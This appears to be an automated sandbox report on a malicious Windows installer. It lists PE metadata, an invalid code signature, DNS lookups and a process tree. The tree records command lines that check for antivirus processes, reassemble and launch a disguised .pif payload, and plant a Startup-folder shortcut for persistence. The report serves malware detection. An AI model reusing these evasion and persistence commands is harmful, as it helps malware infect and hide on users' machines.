                                            SHA1:a1e2d3d973fc37992a07668ab024f5df81e1545a
                                            SHA256:48a4042854a402824d35f4c95aed1e448d652d79ed0c251635acbc073200dfcf
                                            SHA512:c61b62eef10ab53a2118a750bd62ff5477e929a4d06b571d9be7d270800e2fbcc62308c2ba13fa45afb1d5d5af3d05e12935ddd7ca89aa3b979103f97b28bf17
                                            SSDEEP:24576:EzZ6PHT6c/ZGYPcdKna0uVBIDB/E2c4K4LOGA7:Euzf/ZnhRSCB/E2caHA7
                                            TLSH:87152343A2058C75FEA20F718AB10512DBFF8E9E15274547A779EA416F387C1272CF29
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.ydx..7x..7x..7_Hz7{..7_Hl7i..7x..7...7q..7s..7q..7y..7q..7y..7Richx..7........................PE..L....l.K.................h.

                                            File Icon

                                            Icon Hash:f0c4ccccccccecf4

                                            Static PE Info

                                            General

                                            Entrypoint:0x403415
                                            Entrypoint Section:.text
                                            Digitally signed:true
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x4BC06CDA [Sat Apr 10 12:19:38 2010 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:5
                                            OS Version Minor:0
                                            File Version Major:5
                                            File Version Minor:0
                                            Subsystem Version Major:5
                                            Subsystem Version Minor:0
                                            Import Hash:bf95d1fc1d10de18b32654b123ad5e1f

                                            Authenticode Signature

                                            Signature Valid:false
                                            Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                            Signature Validation Error:The digital signature of the object did not verify
                                            Error Number:-2146869232
                                            Not Before, Not After
                                            • 14/03/2023 00:00:00 06/04/2025 00:59:59
                                            Subject Chain
                                            • CN="Now.gg, INC", O="Now.gg, INC", L=Campbell, S=California, C=US, SERIALNUMBER=4559077, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US
                                            Version:3
                                            Thumbprint MD5:B36E3D9DABB354A9E7F4DF3CC89D1E23
                                            Thumbprint SHA-1:DBC310671AC6A69DB3643A6B93824251D4AA329A
                                            Thumbprint SHA-256:E1DD51B2509B140813272E25325E41E7B50A9EB5DD6D937A9A832579235E45FF
                                            Serial:04F9D50A6C792C9FD39D472E9837B5FF

                                            Entrypoint Preview

                                            Instruction
                                            sub esp, 000002D4h
                                            push ebx
                                            push ebp
                                            push esi
                                            push edi
                                            push 00000020h
                                            xor ebp, ebp
                                            pop esi
                                            mov dword ptr [esp+18h], ebp
                                            mov dword ptr [esp+10h], 00408570h
                                            mov dword ptr [esp+14h], ebp
                                            call dword ptr [00408030h]
                                            push 00008001h
                                            call dword ptr [004080B4h]
                                            push ebp
                                            call dword ptr [004082B0h]
                                            push 00000008h
                                            mov dword ptr [0047B398h], eax
                                            call 00007F35B8819CCCh
                                            push ebp
                                            push 000002B4h
                                            mov dword ptr [0047B2B0h], eax
                                            lea eax, dword ptr [esp+38h]
                                            push eax
                                            push ebp
                                            push 0040856Ch
                                            call dword ptr [00408180h]
                                            push 00408554h
                                            push 004732A0h
                                            call 00007F35B8819B9Ah
                                            call dword ptr [004080B0h]
                                            push eax
                                            mov edi, 004CC0A0h
                                            push edi
                                            call 00007F35B8819B88h
                                            push ebp
                                            call dword ptr [00408130h]
                                            cmp word ptr [004CC0A0h], 0022h
                                            mov dword ptr [0047B2B8h], eax
                                            mov eax, edi
                                            jne 00007F35B881756Ah
                                            push 00000022h
                                            pop esi
                                            mov eax, 004CC0A2h
                                            push esi
                                            push eax
                                            call 00007F35B881985Ch
                                            push eax
                                            call dword ptr [00408250h]
                                            mov esi, eax
                                            mov dword ptr [esp+1Ch], esi
                                            jmp 00007F35B88175F1h
                                            push 00000020h
                                            pop ebx
                                            cmp ax, bx
                                            jne 00007F35B8817569h
                                            inc esi
                                            inc esi
                                            cmp word ptr [esi], bx
                                            je 00007F35B881755Bh

                                            Rich Headers

                                            Programming Language:
                                            • [ C ] VS2005 build 50727
                                            • [IMP] VS2005 build 50727
                                            • [ C ] VS2008 SP1 build 30729
                                            • [LNK] VS2008 SP1 build 30729

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x8afc0xb4.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xfd0000x65a8.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0xd95240x2978.ndata
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2c0.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x671c0x68008bb8f6dca80ad27cbdbce9816ab6ae7cFalse0.6644381009615384data6.50478910452928IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata0x80000x19d60x1a00161b329b4c70ce4fbd9c1143e738896bFalse0.4480168269230769data5.026839717718007IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0xa0000x7139c0x200140876ba314e7bc36379ee5c6db80876False0.271484375data1.7360077526852977IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .ndata0x7c0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc0xfd0000x65a80x66003d532b786dc7d2225c702e184559b4e7False0.5012254901960784data5.298120201724995IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_ICON0xfd2080x5638Device independent bitmap graphic, 72 x 144 x 32, image size 22032EnglishUnited States0.49302283436027544
                                            RT_ICON0x1028400x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.8014184397163121
                                            RT_DIALOG0x102ca80x100dataEnglishUnited States0.5234375
                                            RT_DIALOG0x102da80x11cdataEnglishUnited States0.6056338028169014
                                            RT_DIALOG0x102ec80x60dataEnglishUnited States0.7291666666666666
                                            RT_GROUP_ICON0x102f280x22dataEnglishUnited States0.9705882352941176
                                            RT_VERSION0x102f500x37cdataEnglishUnited States0.4327354260089686
                                            RT_MANIFEST0x1032d00x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                            Imports

                                            DLLImport
                                            KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, MulDiv, lstrlenA, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                            USER32.dllScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, FindWindowExW, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, IsWindow
                                            GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                            SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                            ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                            COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                            ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                            VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                            Possible Origin

                                            Language of compilation systemCountry where language is spokenMap
                                            EnglishUnited States

                                            Network Behavior

                                            Network Port Distribution

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Aug 31, 2024 20:26:59.464737892 CEST6422053192.168.2.41.1.1.1
                                            Aug 31, 2024 20:26:59.473659992 CEST53642201.1.1.1192.168.2.4
                                            Aug 31, 2024 20:27:11.771641970 CEST6427753192.168.2.41.1.1.1
                                            Aug 31, 2024 20:27:11.812242985 CEST53642771.1.1.1192.168.2.4

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Aug 31, 2024 20:26:59.464737892 CEST192.168.2.41.1.1.10x5cf8Standard query (0)XfYprRGwPXpYAiIF.XfYprRGwPXpYAiIFA (IP address)IN (0x0001)false
                                            Aug 31, 2024 20:27:11.771641970 CEST192.168.2.41.1.1.10x20beStandard query (0)XfYprRGwPXpYAiIF.XfYprRGwPXpYAiIFA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Aug 31, 2024 20:26:59.473659992 CEST1.1.1.1192.168.2.40x5cf8Name error (3)XfYprRGwPXpYAiIF.XfYprRGwPXpYAiIFnonenoneA (IP address)IN (0x0001)false
                                            Aug 31, 2024 20:27:11.812242985 CEST1.1.1.1192.168.2.40x20beName error (3)XfYprRGwPXpYAiIF.XfYprRGwPXpYAiIFnonenoneA (IP address)IN (0x0001)false

                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:14:26:54
                                            Start date:31/08/2024
                                            Path:C:\Users\user\Desktop\C3KzPHU3UG.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\C3KzPHU3UG.exe"
                                            Imagebase:0x400000
                                            File size:900'764 bytes
                                            MD5 hash:B1202E7766F87458E7BBEE5A2B2103CA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:1
                                            Start time:14:26:54
                                            Start date:31/08/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\cmd.exe" /k move Sexuality Sexuality.cmd & Sexuality.cmd & exit
                                            Imagebase:0x240000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:2
                                            Start time:14:26:54
                                            Start date:31/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:3
                                            Start time:14:26:55
                                            Start date:31/08/2024
                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                            Wow64 process (32bit):true
                                            Commandline:tasklist
                                            Imagebase:0xdb0000
                                            File size:79'360 bytes
                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            General

                                            Target ID:4
                                            Start time:14:26:55
                                            Start date:31/08/2024
                                            Path:C:\Windows\SysWOW64\findstr.exe
                                            Wow64 process (32bit):true
                                            Commandline:findstr /I "wrsa.exe opssvc.exe"
                                            Imagebase:0x2b0000
                                            File size:29'696 bytes
                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            General

                                            Target ID:5
                                            Start time:14:26:57
                                            Start date:31/08/2024
                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                            Wow64 process (32bit):true
                                            Commandline:tasklist
                                            Imagebase:0xdb0000
                                            File size:79'360 bytes
                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            General

                                            Target ID:6
                                            Start time:14:26:57
                                            Start date:31/08/2024
                                            Path:C:\Windows\SysWOW64\findstr.exe
                                            Wow64 process (32bit):true
                                            Commandline:findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
                                            Imagebase:0x2b0000
                                            File size:29'696 bytes
                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            General

                                            Target ID:7
                                            Start time:14:26:57
                                            Start date:31/08/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:cmd /c md 585723
                                            Imagebase:0x240000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:8
                                            Start time:14:26:57
                                            Start date:31/08/2024
                                            Path:C:\Windows\SysWOW64\findstr.exe
                                            Wow64 process (32bit):true
                                            Commandline:findstr /V "TranscriptHousesConstitutesMedicaid" Hate
                                            Imagebase:0x2b0000
                                            File size:29'696 bytes
                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            General

                                            Target ID:9
                                            Start time:14:26:57
                                            Start date:31/08/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:cmd /c copy /b ..\Rod + ..\Keep + ..\Prep + ..\Tsunami + ..\Invitations F
                                            Imagebase:0x240000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:10
                                            Start time:14:26:58
                                            Start date:31/08/2024
                                            Path:C:\Users\user\AppData\Local\Temp\585723\Designing.pif
                                            Wow64 process (32bit):true
                                            Commandline:Designing.pif F
                                            Imagebase:0xb30000
                                            File size:893'608 bytes
                                            MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 0%, ReversingLabs
                                            • Detection: 4%, Virustotal, Browse
                                            Reputation:high
                                            Has exited:false

                                            General

                                            Target ID:11
                                            Start time:14:26:58
                                            Start date:31/08/2024
                                            Path:C:\Windows\SysWOW64\choice.exe
                                            Wow64 process (32bit):true
                                            Commandline:choice /d y /t 5
                                            Imagebase:0x320000
                                            File size:28'160 bytes
                                            MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            General

                                            Target ID:12
                                            Start time:14:26:58
                                            Start date:31/08/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoSync.url" & echo URL="C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoSync.url" & exit
                                            Imagebase:0x240000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:13
                                            Start time:14:26:58
                                            Start date:31/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:14
                                            Start time:14:27:08
                                            Start date:31/08/2024
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.js"
                                            Imagebase:0x7ff726600000
                                            File size:170'496 bytes
                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:15
                                            Start time:14:27:08
                                            Start date:31/08/2024
                                            Path:C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif" "C:\Users\user\AppData\Local\SyncTech Innovations\p"
                                            Imagebase:0x690000
                                            File size:893'608 bytes
                                            MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 0%, ReversingLabs
                                            • Detection: 4%, Virustotal, Browse
                                            Has exited:false

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:12.8%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:21.4%
                                              Total number of Nodes:1325
                                              Total number of Limit Nodes:22
                                              execution_graph 3660 4025c1 3661 40154d 19 API calls 3660->3661 3662 4025cb 3661->3662 3663 40145c 18 API calls 3662->3663 3664 4025d5 3663->3664 3665 401721 3664->3665 3666 4025e2 RegQueryValueExW 3664->3666 3667 402603 3666->3667 3670 402609 3666->3670 3667->3670 3671 4059ff wsprintfW 3667->3671 3669 4025b6 RegCloseKey 3669->3665 3670->3665 3670->3669 3671->3670 3095 4018c3 3101 40145c 3095->3101 3099 4018d2 3100 40592d 2 API calls 3099->3100 3100->3099 3102 401462 3101->3102 3111 4060ca 3102->3111 3105 401493 3107 40592d 3105->3107 3108 40593a GetTickCount GetTempFileNameW 3107->3108 3109 405970 3108->3109 3110 405974 3108->3110 3109->3108 3109->3110 3110->3099 3114 4060d7 3111->3114 3112 406341 3113 401487 3112->3113 3146 405ab8 lstrcpynW 3112->3146 3113->3105 3130 405ae7 3113->3130 3114->3112 3116 406198 GetVersion 3114->3116 3117 40630b lstrlenW 3114->3117 3120 4060ca 10 API calls 3114->3120 3124 405ae7 5 API calls 3114->3124 3144 4059ff wsprintfW 3114->3144 3145 405ab8 lstrcpynW 3114->3145 3125 4061a5 3116->3125 3117->3114 3120->3117 3121 406217 GetSystemDirectoryW 3121->3125 3123 40622a GetWindowsDirectoryW 3123->3125 3124->3114 3125->3114 3125->3121 3125->3123 3126 4060ca 10 API calls 3125->3126 3127 4062a4 lstrcatW 3125->3127 3128 40625e SHGetSpecialFolderLocation 3125->3128 3139 405981 RegOpenKeyExW 3125->3139 3126->3125 3127->3114 3128->3125 3129 406276 SHGetPathFromIDListW CoTaskMemFree 3128->3129 3129->3125 3137 405af4 3130->3137 3131 405b70 CharPrevW 3134 405b6a 3131->3134 3132 405b5d CharNextW 3132->3134 3132->3137 3134->3131 3135 405b92 3134->3135 3135->3105 3136 405b49 CharNextW 3136->3137 3137->3132 3137->3134 3137->3136 3138 405b58 CharNextW 3137->3138 3147 4057b3 3137->3147 3138->3132 3140 4059b5 RegQueryValueExW 3139->3140 3141 4059fa 3139->3141 3142 4059d7 RegCloseKey 3140->3142 3141->3125 3142->3141 3144->3114 3145->3114 3146->3113 3148 4057b9 3147->3148 3149 4057cf 3148->3149 3150 4057c0 CharNextW 3148->3150 3149->3137 3150->3148 3672 402c43 3673 40145c 18 API calls 3672->3673 3674 402c4b 3673->3674 3679 405c70 GlobalAlloc lstrlenW 3674->3679 3676 402c51 3706 4059ff wsprintfW 3676->3706 3678 402c58 3680 405ca6 3679->3680 3681 405cf8 3679->3681 3682 405cd3 GetVersionExW 3680->3682 3707 405ada CharUpperW 3680->3707 3681->3676 3682->3681 3683 405d02 3682->3683 3685 405d11 3683->3685 3686 405d28 LoadLibraryA 3683->3686 3685->3681 3687 405e49 GlobalFree 3685->3687 3686->3681 3688 405d46 GetProcAddress GetProcAddress GetProcAddress 3686->3688 3689 405fa1 FreeLibrary 3687->3689 3690 405e5f LoadLibraryA 3687->3690 3694 405d6e 3688->3694 3701 405eb9 3688->3701 3689->3681 3690->3681 3691 405e79 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 3690->3691 3691->3701 3692 405f15 FreeLibrary 3693 405eee 3692->3693 3696 405fae 3693->3696 3703 405f49 lstrcmpW 3693->3703 3704 405f7a CloseHandle 3693->3704 3705 405f98 CloseHandle 3693->3705 3695 405d92 FreeLibrary GlobalFree 3694->3695 3700 405dae 3694->3700 3694->3701 3695->3681 3698 405fb3 CloseHandle FreeLibrary 3696->3698 3697 405dc0 lstrcpyW OpenProcess 3699 405e13 CloseHandle CharUpperW lstrcmpW 3697->3699 3697->3700 3702 405fc8 CloseHandle 3698->3702 3699->3700 3699->3701 3700->3687 3700->3697 3700->3699 3701->3692 3701->3693 3702->3698 3703->3693 3703->3702 3704->3693 3705->3689 3706->3678 3707->3680 3708 404f45 3709 405099 3708->3709 3710 404f5d 3708->3710 3712 4050ea 3709->3712 3713 4050aa GetDlgItem GetDlgItem 3709->3713 3710->3709 3711 404f69 3710->3711 3715 404f74 SetWindowPos 3711->3715 3716 404f87 3711->3716 3714 405144 3712->3714 3725 40139b 2 API calls 3712->3725 3793 4038c7 3713->3793 3719 403937 SendMessageW 3714->3719 3739 405094 3714->3739 3715->3716 3720 404fa4 3716->3720 3721 404f8c ShowWindow 3716->3721 3718 4050d4 SetClassLongW 3722 40141d 2 API calls 3718->3722 3744 405156 3719->3744 3723 404fc6 3720->3723 3724 404fac DestroyWindow 3720->3724 3721->3720 3722->3712 3726 404fcb SetWindowLongW 3723->3726 3727 404fdc 3723->3727 3775 4053a8 3724->3775 3728 40511c 3725->3728 3726->3739 3730 405053 3727->3730 3731 404fe8 GetDlgItem 3727->3731 3728->3714 3732 405120 SendMessageW 3728->3732 3729 4053aa DestroyWindow EndDialog 3729->3775 3779 403952 3730->3779 3734 405018 3731->3734 3735 404ffb SendMessageW IsWindowEnabled 3731->3735 3732->3739 3733 40141d 2 API calls 3733->3744 3740 405025 3734->3740 3742 40506c SendMessageW 3734->3742 3743 405038 3734->3743 3750 40501d 3734->3750 3735->3734 3735->3739 3737 4053d9 ShowWindow 3737->3739 3738 4060ca 18 API calls 3738->3744 3740->3742 3740->3750 3742->3730 3745 405040 3743->3745 3746 405055 3743->3746 3744->3729 3744->3733 3744->3738 3744->3739 3747 4038c7 19 API calls 3744->3747 3751 4038c7 19 API calls 3744->3751 3766 4052ea DestroyWindow 3744->3766 3749 40141d 2 API calls 3745->3749 3748 40141d 2 API calls 3746->3748 3747->3744 3748->3750 3749->3750 3750->3730 3776 4038a0 3750->3776 3752 4051d1 GetDlgItem 3751->3752 3753 4051e6 3752->3753 3754 4051ef ShowWindow EnableWindow 3752->3754 3753->3754 3796 40390d EnableWindow 3754->3796 3756 405219 EnableWindow 3759 40522d 3756->3759 3757 405232 GetSystemMenu EnableMenuItem SendMessageW 3758 405262 SendMessageW 3757->3758 3757->3759 3758->3759 3759->3757 3797 403920 SendMessageW 3759->3797 3798 405ab8 lstrcpynW 3759->3798 3762 405290 lstrlenW 3763 4060ca 18 API calls 3762->3763 3764 4052a6 SetWindowTextW 3763->3764 3765 40139b 2 API calls 3764->3765 3765->3744 3767 405304 CreateDialogParamW 3766->3767 3766->3775 3768 405337 3767->3768 3767->3775 3769 4038c7 19 API calls 3768->3769 3770 405342 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3769->3770 3771 40139b 2 API calls 3770->3771 3772 405388 3771->3772 3772->3739 3773 405390 ShowWindow 3772->3773 3774 403937 SendMessageW 3773->3774 3774->3775 3775->3737 3775->3739 3777 4038a7 3776->3777 3778 4038ad SendMessageW 3776->3778 3777->3778 3778->3730 3780 4039f0 3779->3780 3781 403967 GetWindowLongW 3779->3781 3780->3739 3781->3780 3782 403978 3781->3782 3783 403987 GetSysColor 3782->3783 3784 40398a 3782->3784 3783->3784 3785 403990 SetTextColor 3784->3785 3786 40399a SetBkMode 3784->3786 3785->3786 3787 4039b2 GetSysColor 3786->3787 3788 4039b8 3786->3788 3787->3788 3789 4039c9 3788->3789 3790 4039bf SetBkColor 3788->3790 3789->3780 3791 4039e3 CreateBrushIndirect 3789->3791 3792 4039dc DeleteObject 3789->3792 3790->3789 3791->3780 3792->3791 3794 4060ca 18 API calls 3793->3794 3795 4038d2 SetDlgItemTextW 3794->3795 3795->3718 3796->3756 3797->3759 3798->3762 3799 402145 3800 402158 3799->3800 3804 40220a 3799->3804 3801 40145c 18 API calls 3800->3801 3802 402160 3801->3802 3803 40145c 18 API calls 3802->3803 3805 40216a 3803->3805 3806 402181 LoadLibraryExW 3805->3806 3807 402174 GetModuleHandleW 3805->3807 3806->3804 3808 402191 3806->3808 3807->3806 3807->3808 3817 405c29 GlobalAlloc WideCharToMultiByte 3808->3817 3810 40219a 3811 4021a0 3810->3811 3812 4021dd 3810->3812 3814 401435 25 API calls 3811->3814 3815 4021b0 3811->3815 3813 404a73 25 API calls 3812->3813 3813->3815 3814->3815 3815->3804 3816 4021fe FreeLibrary 3815->3816 3816->3804 3818 405c61 GlobalFree 3817->3818 3819 405c54 GetProcAddress 3817->3819 3818->3810 3819->3818 3542 401646 3547 401446 3542->3547 3544 40164d Sleep 3546 402c58 3544->3546 3548 4060ca 18 API calls 3547->3548 3549 401455 3548->3549 3549->3544 3820 401e46 3821 401446 18 API calls 3820->3821 3822 401e4d IsWindow 3821->3822 3823 401ac7 3824 401a8b 3823->3824 3825 401a7d 3823->3825 3826 40145c 18 